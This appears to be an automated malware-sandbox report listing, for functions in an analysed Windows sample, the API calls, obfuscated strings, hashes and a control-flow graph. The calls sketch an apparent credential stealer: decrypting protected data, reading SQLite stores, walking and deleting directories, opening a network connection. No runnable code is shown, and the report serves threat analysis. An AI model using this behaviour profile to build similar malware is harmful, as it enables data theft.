                                                                                                                                                                                    • String ID: BI^$BI^$BI^$BI^$DGFA$DGFA$DI[N$F]]E$KGNC$KGNC$MEAB$NB^$OAZ^$T[VO$dGFA$dGFA$h]]F$kGJK$kGJK$kGJK$kGJK$kGJK$kGJK$kGNC$kGNC$oAZ^$oAZ^$oMYO$oMYO$oMYO$pMK$pMK$pMK
                                                                                                                                                                                    • API String ID: 0-1035761944
                                                                                                                                                                                    • Opcode ID: 2e67f5fe62409dc573456b2142c68ffda388977054eb05ccac4d285e9bc6ad3e
                                                                                                                                                                                    • Instruction ID: b39ed098f56cb9bdbe68e435b46d6f233cdf8906699557f55fc555612d00ba2b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e67f5fe62409dc573456b2142c68ffda388977054eb05ccac4d285e9bc6ad3e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AC2DD70D082998BDB19DF64C8557DEBBB1AF1A308F1481DCD4896B243EB709B89CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0006B5CA
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(465C4951,?), ref: 0006BA46
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoadUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: /,ms$HI^$MEAK$OAZ^$OAZ^$SADO$\A][$_kHZ$_kHZ$cannot use operator[] with a string argument with $fDT_$fDT_$g`)#$qI\F$qI\F$qI\F$wI]B$wZFL${XEK${X[E
                                                                                                                                                                                    • API String ID: 2188052229-683922061
                                                                                                                                                                                    • Opcode ID: 1c0439bf132ddb24b7d0f24b6b41b7f95b327b768a05da39b8757c2032ab94d9
                                                                                                                                                                                    • Instruction ID: b6c639e2513740ce5ebd26942ba21c08bd9ab64f5df250d83e744cbe15490c68
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c0439bf132ddb24b7d0f24b6b41b7f95b327b768a05da39b8757c2032ab94d9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DD2F2709042588FEB25CF64CC45BEEBBB6AF15304F14419DE449AB292EB709BC5CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,001661C0,00000000), ref: 00070452
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID: KGNC$KGNC$WIZY$WZFL$\C_J$\G^@$\G^@$\G^@$\G^@$bEHC$cannot use operator[] with a string argument with $nehz$nehz$nehz$o|}z$o|}z$te}z$te}z$te}z
                                                                                                                                                                                    • API String ID: 71445658-906255000
                                                                                                                                                                                    • Opcode ID: 55a03424c190c6796f4bb4b9a544f1b8bb2b8f0ecd2326c4e8538041fa8f4ec8
                                                                                                                                                                                    • Instruction ID: acf8ee7e3dcef1d54ce89460da2890219dad28f1313352960824c7a061098f03
                                                                                                                                                                                    • Opcode Fuzzy Hash: 55a03424c190c6796f4bb4b9a544f1b8bb2b8f0ecd2326c4e8538041fa8f4ec8
                                                                                                                                                                                    • Instruction Fuzzy Hash: FD929D70C04258DEEF25CB64CC44BEDBBB8AF15304F1482D9E449A7282EB756B89CF65
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 0006D730
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006D760
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006E2C6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006E2D6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006EC6D
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006D84C
                                                                                                                                                                                      • Part of subcall function 0009D850: Concurrency::cancel_current_task.LIBCPMT ref: 0009D92D
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006EC24
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesConcurrency::cancel_current_taskFile
                                                                                                                                                                                    • String ID: X_CV$YMJK$\C_J$fKJE$invalid stoi argument$jONA$stoi argument out of range$wIZY${EHZ${M^]${{]E
                                                                                                                                                                                    • API String ID: 3826552558-358244274
                                                                                                                                                                                    • Opcode ID: 5823baf99926bef29630bcba2a6d7338be62483d1d146812d01fdb8d71279d3f
                                                                                                                                                                                    • Instruction ID: cc66b7c6e6764f7b84a7b5a23d28283e17cd20d5ad423194c837265c31f965aa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5823baf99926bef29630bcba2a6d7338be62483d1d146812d01fdb8d71279d3f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65E2D570D002988FEF19CF68CC98BEDBBB6AF55304F148299D04967292DB749AC5CF61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Initstd::locale::_
                                                                                                                                                                                    • String ID: @\FA$BFJX$BFJX$BFJX$D^Fr$H[vI$H[vI$H[vI$KoZW$KoZW$NB^$R\YK$R\YK$R\YK$SGBO$TM[\$YU]Z$YU]Z$YU]Z$cannot use operator[] with a string argument with $iM]]
                                                                                                                                                                                    • API String ID: 1620887387-3241639465
                                                                                                                                                                                    • Opcode ID: 77132a45e13487fe259cd8854d1502723a8352774f4c8c86545a57583a7abbe1
                                                                                                                                                                                    • Instruction ID: 8db635abf267baf75149623425008e876ddcc85db4fe8ef319d3f2512fa83467
                                                                                                                                                                                    • Opcode Fuzzy Hash: 77132a45e13487fe259cd8854d1502723a8352774f4c8c86545a57583a7abbe1
                                                                                                                                                                                    • Instruction Fuzzy Hash: B823E170D002588FDF29CF68CC48BEEBBB5AF55304F1482D9E84967292DB745B89CB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesConcurrency::cancel_current_taskCreateDirectoryFile
                                                                                                                                                                                    • String ID: /$5J$@WK^$FJ$K@$KGNCE$KGNCE$PJ$WIZY\C_J$WIZY\C_J$WZFL$WZFL$X[B\$]R$wZFLB@H]${${${NFR${XHY${j[E\_H\\
                                                                                                                                                                                    • API String ID: 1266625421-2645360642
                                                                                                                                                                                    • Opcode ID: 8bae0f0cccfa1a434dbf2cb3fd62de4cfbfe34235a3b99c1e5c4c48639aca37d
                                                                                                                                                                                    • Instruction ID: f36f1701f256acbe60cf817cd0e8a6f973cc086d32bb7bad23b1e188c31d761f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bae0f0cccfa1a434dbf2cb3fd62de4cfbfe34235a3b99c1e5c4c48639aca37d
                                                                                                                                                                                    • Instruction Fuzzy Hash: EFE26A70D042599ADF25EBA0CC56BEDBBB8AF15304F4044A8E44977293EF742B88DF61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @^uS$BI^$BI^$BPYC$CGDK$DGFA$DGFA$IIDO$MEAK$O\]Z$QIE_$TMJ_$WI]B$YMYG$cannot use operator[] with a string argument with $dBAW$wI]B$wZFL${X[E
                                                                                                                                                                                    • API String ID: 0-3218710604
                                                                                                                                                                                    • Opcode ID: 6850140f5d64960e25d9ba2de70a658bb0c367a115654f0d454c3444f67d6044
                                                                                                                                                                                    • Instruction ID: 43dfe82e905ffc0f34760c8c21f2b6e0f2a33a36a705cc7bc502eacc0cb92bba
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6850140f5d64960e25d9ba2de70a658bb0c367a115654f0d454c3444f67d6044
                                                                                                                                                                                    • Instruction Fuzzy Hash: A203E070E00259CBDB25CF68CC44BEEBBB5AF15304F1441E8E449A7682EB75AE85CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Initstd::locale::_
                                                                                                                                                                                    • String ID: OUSY$OUSY$OYSM$RRZM$RRZM$RT]X$RT]X$d]MN$d]MN$yicz$yicz$yicz${k|x${k|x${k|x
                                                                                                                                                                                    • API String ID: 1620887387-3943848870
                                                                                                                                                                                    • Opcode ID: 266ad6d0a6a0f2cbf6bcd8ecea2d28a6db72f51fc7458c8ceb98b802c78f4505
                                                                                                                                                                                    • Instruction ID: db8415989961f9f9f55bf788d5526be90af399ea7d95874a9745d104f4d01aff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 266ad6d0a6a0f2cbf6bcd8ecea2d28a6db72f51fc7458c8ceb98b802c78f4505
                                                                                                                                                                                    • Instruction Fuzzy Hash: F913F2708002598FDF19CF68CD98BEEBBB5AF55304F1082D8E4496B292D7749B89CF61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: /,ms$AAEO$AAEO$HI^$MEAK$WI]B$\A][$cannot use operator[] with a string argument with $g`)#$wI]B$wZFL${XEK${X[E
                                                                                                                                                                                    • API String ID: 0-3600237339
                                                                                                                                                                                    • Opcode ID: 68f57b974a0a4efe66f54c2ab4962ccb6c8ebe2f9830221c7a08b16ec787ed3b
                                                                                                                                                                                    • Instruction ID: 2bdaa4d0be0bf6495012e8fa071e2133169b23b58b35e37e4f235ace78e062e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 68f57b974a0a4efe66f54c2ab4962ccb6c8ebe2f9830221c7a08b16ec787ed3b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15D2D370D042588FEF29CB64CC55BEEBBB5AF15304F1482D8E449A7282DB749B89CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock
                                                                                                                                                                                    • String ID: &$$=$;?#+$F]]E$F]]E$IIDO$MEAB$MEAB$MEAK$QIE_$cannot use operator[] with a string argument with $wI]B$wZFL${X[E
                                                                                                                                                                                    • API String ID: 1418687624-3597907084
                                                                                                                                                                                    • Opcode ID: 8f124c5c8bd478cd2f5831d2cc848c3be525c2d24fe42565e3260e4b5d488128
                                                                                                                                                                                    • Instruction ID: 852ce8895fe70184c5d9515615a1a2c07dd161e0c562600c2a84bb2ae47d8b3d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f124c5c8bd478cd2f5831d2cc848c3be525c2d24fe42565e3260e4b5d488128
                                                                                                                                                                                    • Instruction Fuzzy Hash: 08B2D070904258CFDB25CF64CC45BEEBBB5AF15304F1481DCE449AB282EB71AA89CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • std::locale::_Init.LIBCPMT ref: 0006097E
                                                                                                                                                                                      • Part of subcall function 000991D0: std::_Lockit::_Lockit.LIBCPMT ref: 000991FE
                                                                                                                                                                                      • Part of subcall function 000991D0: std::_Lockit::_Lockit.LIBCPMT ref: 00099221
                                                                                                                                                                                      • Part of subcall function 000991D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00099241
                                                                                                                                                                                      • Part of subcall function 000991D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00099275
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Initstd::locale::_
                                                                                                                                                                                    • String ID: BEHC$EM@K$HYOM$R[LX$n:
                                                                                                                                                                                    • API String ID: 1226965381-3806352440
                                                                                                                                                                                    • Opcode ID: ce8fd706cea5b0f79de8ae3e711c27ea09386d7517a93f1c7e8b04a8df505405
                                                                                                                                                                                    • Instruction ID: 30a19d9fa335b6ce067590d5ddc15389f580c7aaa4fd4ef5300a883d79f9460c
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce8fd706cea5b0f79de8ae3e711c27ea09386d7517a93f1c7e8b04a8df505405
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8482F470D10248CFDF18DF68C8987EEBBB2BF55304F14829CE445AB692DB749A84CB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 24166 3c050-3c088 call 10c3b3 24169 3c412-3c413 call 10c05c 24166->24169 24170 3c08e-3c0c7 24166->24170 24171 3c418 call 32040 24169->24171 24170->24171 24172 3c0cd-3c156 call 9d850 FindFirstFileA 24170->24172 24177 3c41d-3c422 call 112350 24171->24177 24182 3c369 24172->24182 24183 3c15c 24172->24183 24184 3c36b-3c371 24182->24184 24185 3c160-3c169 24183->24185 24186 3c373-3c37f 24184->24186 24187 3c39f-3c3b7 24184->24187 24188 3c170-3c175 24185->24188 24189 3c381-3c38f 24186->24189 24190 3c395-3c39c call 10d0b2 24186->24190 24192 3c3e1-3c411 call 10c3c4 24187->24192 24193 3c3b9-3c3c5 24187->24193 24188->24188 24191 3c177-3c1c3 24188->24191 24189->24177 24189->24190 24190->24187 24191->24171 24203 3c1c9-3c29c call 9d850 call 95b20 call 95c90 24191->24203 24197 3c3d7-3c3de call 10d0b2 24193->24197 24198 3c3c7-3c3d5 24193->24198 24197->24192 24198->24177 24198->24197 24214 3c29e-3c2a5 call 3c050 24203->24214 24215 3c2bc-3c2d5 24203->24215 24214->24215 24218 3c2db-3c2ef 24215->24218 24219 3c35f-3c367 24215->24219 24218->24219 24222 3c2f1-3c302 FindNextFileA 24218->24222 24219->24184 24222->24185 24223 3c308-3c31a 24222->24223 24223->24184 24226 3c31c-3c322 24223->24226 24227 3c326-3c334 SetFileAttributesA 24226->24227 24228 3c324 24226->24228 24229 3c341-3c345 24227->24229 24230 3c336-3c33f 24227->24230 24228->24227 24231 3c347 24229->24231 24232 3c349-3c352 RemoveDirectoryA 24229->24232 24230->24184 24231->24232 24232->24182 24234 3c354-3c35d 24232->24234 24234->24184
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                    • API String ID: 0-1173974218
                                                                                                                                                                                    • Opcode ID: 4c18e04266c7738a5ece624366495c5f2e76cb5c6d7ec7715a441c1b5a7f27a0
                                                                                                                                                                                    • Instruction ID: 22a292d44d86e24c032276fc3831b41941bf6f2bb95ebed743fcda1a5fcf45fd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c18e04266c7738a5ece624366495c5f2e76cb5c6d7ec7715a441c1b5a7f27a0
                                                                                                                                                                                    • Instruction Fuzzy Hash: EA91C4719002089FEB16DBA8CD54BEEB7B9EF15304F244658E451F7182DB71AE84CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
                                                                                                                                                                                    • API String ID: 0-1885142750
                                                                                                                                                                                    • Opcode ID: 139c69f87d30f0fcf867fa20ed337b7b8ef59a3845f10a2d440466e4da8e09c9
                                                                                                                                                                                    • Instruction ID: daef450681df1e501f10ead0ec949868ae088cc24b03c54e10b44e5da98371ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 139c69f87d30f0fcf867fa20ed337b7b8ef59a3845f10a2d440466e4da8e09c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 740213B0B007019FEB208F64DC45B6B77E5AF50704F54442CE89A9B6D2E7F5EA84CB92
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID: BI^$DGFA$F]]EMEAB$KGNCE_$OAZ^D^T
                                                                                                                                                                                    • API String ID: 118556049-3591372289
                                                                                                                                                                                    • Opcode ID: fc1a92e41f1c06db32d94add58fc881242988efce6f55223c4b7c5c0f9979c7a
                                                                                                                                                                                    • Instruction ID: 80e77bc6c0ef72fadb4541734661ba6a30fb2c80f6abbaa69836d28e3887b88e
                                                                                                                                                                                    • Opcode Fuzzy Hash: fc1a92e41f1c06db32d94add58fc881242988efce6f55223c4b7c5c0f9979c7a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95E17D71D042889FCF05DBA8C885BDEBBB5AF5A300F14809DE449A7353EB349A48CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: % "/$WI]B$cannot use operator[] with a string argument with $g,&=
                                                                                                                                                                                    • API String ID: 0-1972270083
                                                                                                                                                                                    • Opcode ID: 96c40f627e998b2cd5436bd404d50e7cce74ae25b597fbf1dcdf51d7db43f978
                                                                                                                                                                                    • Instruction ID: ab92e99f0d0454eb455982bcdf056e41bfb79678ca5836d69a72c7d62d4b7355
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96c40f627e998b2cd5436bd404d50e7cce74ae25b597fbf1dcdf51d7db43f978
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FC2E471D002588BDF19CF68CC557EEBBB1BF55305F148298D849AB282DB70AAC9CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WSAStartup.WS2_32 ref: 0004DBDB
                                                                                                                                                                                    • socket.WS2_32(?,?,?,?,?,?,001660D8,?,?), ref: 0004DC7E
                                                                                                                                                                                    • connect.WS2_32(00000000,?,?,?,?,?,001660D8,?,?), ref: 0004DC92
                                                                                                                                                                                    • closesocket.WS2_32(00000000), ref: 0004DC9D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Startupclosesocketconnectsocket
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3098855095-0
                                                                                                                                                                                    • Opcode ID: 163361e59263cacf85f7414f8dc72bc1f7cf581f05dacf91af4ef2372e339d9b
                                                                                                                                                                                    • Instruction ID: fefbc176166ff0b898049f662434b17b103f75d9cf61169525abf480dc49e649
                                                                                                                                                                                    • Opcode Fuzzy Hash: 163361e59263cacf85f7414f8dc72bc1f7cf581f05dacf91af4ef2372e339d9b
                                                                                                                                                                                    • Instruction Fuzzy Hash: D931E7B25043015BC7219B289C8566FB7E5FFCA734F005F2AF9A8922D0E771E8048696
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0003B8E0: __fread_nolock.LIBCMT ref: 0003B9CF
                                                                                                                                                                                    • std::locale::_Init.LIBCPMT ref: 0006097E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Init__fread_nolockstd::locale::_
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 221842284-0
                                                                                                                                                                                    • Opcode ID: f7bee2c4120008a7dfc8d502cde9f76a3bbcb3b0ca0d925f2b75f8abc8cef221
                                                                                                                                                                                    • Instruction ID: 462903f9322edce29a9520ed86c0a7841109163150c95919c8cb5851822867db
                                                                                                                                                                                    • Opcode Fuzzy Hash: f7bee2c4120008a7dfc8d502cde9f76a3bbcb3b0ca0d925f2b75f8abc8cef221
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7922F371910248CBDF18DF68CC897EEBBB2AF55304F14829CE449AB682D7759A84CB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C4A76
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 885266447-0
                                                                                                                                                                                    • Opcode ID: 0e19c762ae4f3687b5384dc08e2991a1b69916aab9515302221636a0b698fdcd
                                                                                                                                                                                    • Instruction ID: 21f4afc0f6529aa5a48a4f25908027cbaf2db7b054a4e3d200c11ca37058409a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e19c762ae4f3687b5384dc08e2991a1b69916aab9515302221636a0b698fdcd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 880246706047418FD7A4CF29C860F6EB7E5BF89314F14492DE48ACB661EB70E949CB52
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0004FFF8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 834300711-0
                                                                                                                                                                                    • Opcode ID: cebe8588e0aa3825f373b7790c24a316815082a85bf9e90fa2d200f11d5b3e3f
                                                                                                                                                                                    • Instruction ID: 89a3d44a738e49d1abb007f5c6e9e75a5fe34657af3c83e4e588cffc1293bd06
                                                                                                                                                                                    • Opcode Fuzzy Hash: cebe8588e0aa3825f373b7790c24a316815082a85bf9e90fa2d200f11d5b3e3f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 723123B14106014BE33C9E28EC4876BB6E5EF91320F044A3DF89587EC2D774E8898BD9
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,000A2DBA,?,761B23A0), ref: 0010B500
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                    • Opcode ID: 58ff7708f50b6239437c2590bf74b47e2c1a5fc0a3fcfe77e3249276eb37e0f2
                                                                                                                                                                                    • Instruction ID: bfaf1a7ad59c281598c71a31efea63a95bf5e6f2728f3ccce39977f58ccb9a7b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58ff7708f50b6239437c2590bf74b47e2c1a5fc0a3fcfe77e3249276eb37e0f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: ECE08C72149108BEEB216F788C40CBB779DEF15324F100924FD94D20E0D7B2AD21A6A0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
